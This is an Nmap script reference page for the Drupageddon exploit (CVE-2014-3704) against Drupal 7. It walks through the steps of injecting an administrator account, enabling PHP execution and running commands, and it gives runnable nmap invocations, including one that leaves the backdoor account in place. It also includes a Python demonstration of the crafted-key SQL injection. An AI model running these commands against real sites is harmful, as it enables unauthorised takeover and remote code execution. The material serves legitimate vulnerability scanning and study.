Script http-vuln-cve2014-3704
Script types:
portrule
Categories:
vuln, intrusive, exploit
Download: https://svn.nmap.org/nmap/scripts/http-vuln-cve2014-3704.nse
Script Summary
Exploits CVE-2014-3704, also known as 'Drupageddon', in Drupal. Drupal core 7.x versions before 7.32 are affected.
The vulnerability allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
The script injects a new Drupal administrator user via the login form and then attempts to log in as this user to determine whether the target is vulnerable. If so, the following exploitation steps are performed:
- the PHP filter module, which allows embedded PHP code/snippets to be evaluated, is enabled,
- the permission to use PHP code is granted to administrator users,
- a new article containing the payload is created and previewed,
- cleanup: by default, all DB records that were added or modified by the script are restored.
Vulnerability originally discovered by Stefan Horst from SektionEins.
The exploitation technique used to achieve RCE on the target is based on the exploit/multi/http/drupal_drupageddon Metasploit module.
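The placeholder-expansion bug behind the "array containing crafted keys" wording above, as an added example: a Python re-implementation of the logic of Drupal 7's DatabaseConnection::expandArguments(), written for this page and not taken from the NSE script (Lua) or from Drupal (PHP). The login query shape, the crafted array keys and the skeleton check are constructed for the demonstration; the real payload used by the script and the Metasploit module is not reproduced here.

```python
import re


def expand_arguments(query, args, fixed=False):
    """Return (expanded_query, expanded_args).

    Mirrors Drupal 7's expandArguments(): every array-valued argument ':key'
    is replaced in the query text by a list of placeholders ':key_<index>'.
    fixed=False reproduces the pre-7.32 behaviour, where <index> is the array
    key supplied by the caller (for a web form, by the client), so a crafted
    key is copied verbatim into the SQL text. fixed=True reproduces the 7.32
    fix, which runs the array through array_values() first, so the index is
    always 0, 1, 2, ...
    """
    query = str(query)
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, (list, dict)):
            continue  # scalar arguments are left alone
        items = list(data.items()) if isinstance(data, dict) else list(enumerate(data))
        if fixed:
            # array_values(): discard caller-supplied keys, renumber from 0.
            items = list(enumerate(value for _, value in items))
        new_keys = {f"{key}_{index}": value for index, value in items}
        # Drupal uses preg_replace('#' . $key . '\b#', ...); ':name'-style
        # keys contain no regex metacharacters, so re.escape() matches the same.
        query = re.sub(re.escape(key) + r"\b", ", ".join(new_keys), query)
        del args[key]
        args.update(new_keys)
    return query, args


def sql_skeleton(query):
    """Collapse each placeholder, or comma-separated run of placeholders,
    into '?' so two queries can be compared on their fixed SQL text only."""
    return re.sub(r":\w+(?:\s*,\s*:\w+)*", "?", query)


def sql_injected(original_query, expanded_query):
    """True when expansion changed the SQL text itself (not just the
    placeholder list), i.e. when an array key leaked SQL into the query."""
    return sql_skeleton(original_query) != sql_skeleton(expanded_query)


# Constructed example (assumed shape, simplified from the user-login lookup):
# the ':name' argument arrives as an array because the client submitted
# name[...]=... form fields, which PHP turns into an array.
LOGIN_QUERY = "SELECT * FROM users WHERE name = :name AND status = 1"
CRAFTED_NAME = {"0 OR 1=1 -- ": "x", 0: "y"}  # constructed crafted keys


if __name__ == "__main__":
    for fixed in (False, True):
        q, a = expand_arguments(LOGIN_QUERY, {":name": CRAFTED_NAME}, fixed=fixed)
        print(f"fixed={fixed}: {q}")
        print(f"  args={a}")
        print(f"  injected={sql_injected(LOGIN_QUERY, q)}")
```

The vulnerable path yields `... name = :name_0 OR 1=1 -- , :name_0 AND status = 1`, with the crafted key now part of the SQL text, while the patched path yields `... name = :name_0, :name_1 AND status = 1`; `sql_injected()` distinguishes the two by comparing the non-placeholder text.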
See also:
Script Arguments
- http-vuln-cve2014-3704.uri
Drupal root directory on the website. Default: /
- http-vuln-cve2014-3704.cmd
Shell command to execute. Default: nil
- http-vuln-cve2014-3704.cleanup
Indicates whether cleanup (removing DB records that were added/modified during the exploitation phase) will be done. Default: true. Set this to false only if you intend to leave the injected administrator account, the enabled PHP filter module and the created article on the target.
- slaxml.debug
See the documentation for the slaxml library.
- http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent
See the documentation for the http library.
- smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername
See the documentation for the smbauth library.
- vulns.short, vulns.showall
See the documentation for the vulns library.
Example Usage
nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" <target>
nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false <target>
Script Output
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2014-3704:
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|       The expandArguments function in the database abstraction API in
|       Drupal core 7.x before 7.32 does not properly construct prepared
|       statements, which allows remote attackers to conduct SQL injection
|       attacks via an array containing crafted keys.
|
|     Disclosure date: 2014-10-15
|     Exploit results:
|       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
|     References:
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|       https://www.drupal.org/SA-CORE-2014-005
|       http://www.securityfocus.com/bid/70595
|_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704
Requires
Author:
License: Same as Nmap--See https://nmap.org/book/man-legal.html